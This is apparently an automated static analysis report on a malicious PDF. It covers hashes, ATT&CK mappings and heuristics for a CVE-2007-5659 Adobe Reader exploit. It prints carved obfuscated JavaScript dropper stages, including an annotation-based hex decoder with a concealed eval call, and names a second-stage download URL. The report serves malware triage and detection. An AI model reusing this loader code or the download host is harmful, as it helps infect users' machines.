Malicious PDF — malware analysis report

Static analysis result for SHA-256 643c4cba69c916a8…

Verdict: MALICIOUS
File type: PDF
Size: 15.3 KB
MD5: 9acb03ee60499ecffd7bd87a7ac3e731
SHA-1: f6f87ad34c20ea6f14d0cad81ef31e0f47bda1bf
SHA-256: 643c4cba69c916a865115555ae68ef7777215c609e8c2e8a8fd27b78a5be8e4b
Risk Score: 366

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

The PDF file contains obfuscated JavaScript that exploits CVE-2007-5659 and gates the payload on specific Adobe Reader versions (the Reader 7.0.x / 8.0–8.1.1 window addressed by APSB08-13). The script is designed to download a second-stage payload from the embedded URL http://searchfunes.org/cgi-bin/153/n002106201r0019R07367a84X30cc559eY4826da27Z0100f060. Deobfuscation reveals a multi-stage dropper mechanism.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (10)

  • Collab.collectEmailInfo — CVE-2007-5659 (severity: critical; CVE match: exact; rule: CVE_2007_5659)
    PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (Identified after static deobfuscation.)
  • JavaScript action (severity: low; 5 related findings; rule: PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) (severity: high; CVE match: likely; rule: PDF_JS_ADOBE_APSB08_13_PATCH_GATE)
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1), the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster (severity: critical; rule: PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper (severity: high; rule: PDF_JS_OBFUSCATED_DROPPER)
    PDF JavaScript shows 5 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, hex_dashed_payload, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers: OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL (severity: high; rule: PDF_JS_SHELLCODE_DOWNLOAD_URL)
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream (severity: low; rule: PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://searchfunes.org/cgi-bin/153/n002106201r0019R07367a84X30cc559eY4826da27Z0100f060 (referenced by PDF JavaScript)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: javascript_obj0005_000.js
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Kind: pdf-javascript-stream
Source: PDF /JS object 5 at offset 0x148
Size: 469 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
Filename: legacy_pdfkit_stage_000.js
SHA-256: 78ac4053b6908ea54e769f221f45637d35df73ecc7da3960a8c5363b50f08a41
Kind: deobfuscated-js
Source: repeated-marker hex decoded JavaScript at offset 0x19D3
Size: 12009 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s) and 1 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):
function oN3_QV3i(g8xu_R2, i0huG1BO){var dJ__2Y1OlVb_1_N = 20;var Lm_hru744PPk = 0;var E_AF8U_X_4a = 512;var km__wY_0I1 = dJ__2Y1OlVb_1_N;var Bq22AA = "";var w_EEwN0_BBbxXd = 4;var hh0YTHLt7A4 = this;var bK2DR7QGhk8_8_V = "1234ee";var r__qReVg = arguments;try {var gLAh_u7b = 0;if (app) {km__wY_0I1 = km__wY_0I1 + 2;i0huG1BO = pr[gLAh_u7b].subject;}bK2DR7QGhk8_8_V = bK2DR7QGhk8_8_V.replace(/\d+/, "call");} catch(e) { }km__wY_0I1 = km__wY_0I1 - dJ__2Y1OlVb_1_N;var o7F_0_O4 = new Array();var p_4K_R_GBd__bq = 150;if (p_4K_R_GBd__bq > 0) {o7F_0_O4[0] = p_4K_R_GBd__bq;o7F_0_O4[1] = E_AF8U_X_4a;o7F_0_O4[0] = o7F_0_O4[0] - p_4K_R_GBd__bq;o7F_0_O4[2] = o7F_0_O4[0];o7F_0_O4[1] = o7F_0_O4[1] - E_AF8U_X_4a;o7F_0_O4[3] = o7F_0_O4[1];}if (g8xu_R2) { o7F_0_O4 = g8xu_R2;}if (!g8xu_R2) {var e_ksX4_e2y_E = r__qReVg[bK2DR7QGhk8_8_V].toString();var g6__vO = 0;var c__vO_l = g6__vO;p_4K_R_GBd__bq = p_4K_R_GBd__bq - 102;var Pfd6_D_u__51v = 0;while(c__vO_l < e_ksX4_e2y_E.length) {Pfd6_D_u__51v = e_ksX4_e2y_E.charCodeAt(c__vO_l);if (Pfd6_D_u__51v >= p_4K_R_GBd__bq && Pfd6_D_u__51v <= 57) {if (g6__vO == w_EEwN0_BBbxXd) {g6__vO = -1;}if (g6__vO < 0) { g6__vO = 0; }o7F_0_O4[g6__vO] += Pfd6_D_u__51v;if (o7F_0_O4[g6__vO] > E_AF8U_X_4a) {o7F_0_O4[g6__vO] -= E_AF8U_X_4a;}g6__vO = g6__vO + 1;}c__vO_l = c__vO_l + 1;}}var JTCoBYI8 = 0;var g2iMdWa = 0;var H4G_F_j = -1;var XRJqe7j = 0;var n0B8Br7 = 0;do {var G7_p8g8T_3rW4 = 256;if (o7F_0_O4[XRJqe7j] > G7_p8g8T_3rW4) {o7F_0_O4[XRJqe7j] -= G7_p8g8T_3rW4;}XRJqe7j = XRJqe7j + 1;} while (XRJqe7j < w_EEwN0_BBbxXd);XRJqe7j = XRJqe7j - w_EEwN0_BBbxXd;while(XRJqe7j < i0huG1BO.length) {var ksgEo__S3uHax = i0huG1BO.substr(XRJqe7j, 1) + ' V V ';XRJqe7j = XRJqe7j + 1;var D3HT0X0 = parseInt(ksgEo__S3uHax, dJ__2Y1OlVb_1_N);if (H4G_F_j != -1) {g2iMdWa += D3HT0X0;if (JTCoBYI8 == w_EEwN0_BBbxXd) {JTCoBYI8 = 0;}var A_x3_y_e1_jp = g2iMdWa;A_x3_y_e1_jp = A_x3_y_e1_jp - (n0B8Br7 + 2) * o7F_0_O4[JTCoBYI8];if (A_x3_y_e1_jp <= 0) {A_x3_y_e1_jp = A_x3_y_e1_jp - 
Math.floor(A_x3_y_e1_jp / 256) * 256;}A_x3_y_e1_jp = String.fromCharCode(A_x3_y_e1_jp);if (km__wY_0I1 == 1) {Bq22AA += D3HT0X0;} else if (km__wY_0I1 == 2) {Bq22AA += A_x3_y_e1_jp;} else {Bq22AA += XRJqe7j;H4G_F_j = -2;}H4G_F_j = -1;JTCoBYI8 = JTCoBYI8 + 1;n0B8Br7 = n0B8Br7 + 1;} else if (H4G_F_j == -1) {H4G_F_j = dJ__2Y1OlVb_1_N;g2iMdWa = D3HT0X0 * dJ__2Y1OlVb_1_N;}}var e6F_7b__s0s = this;e6F_7b__s0s['ev'+'al'](Bq22AA);}
	oN3_QV3i(0, "
... (truncated)
Filename: deobfuscated.js
SHA-256: a476aeec8cbc2ed074fff131ee9a8096822b31cca794c184b9ac2f9035504e7a
Kind: deobfuscated-js
Source: PDF JavaScript deobfuscation pass
Size: 72989 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 9 eval/decoder/string-building token(s) and 2 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app.eval(buf);
}

... (truncated)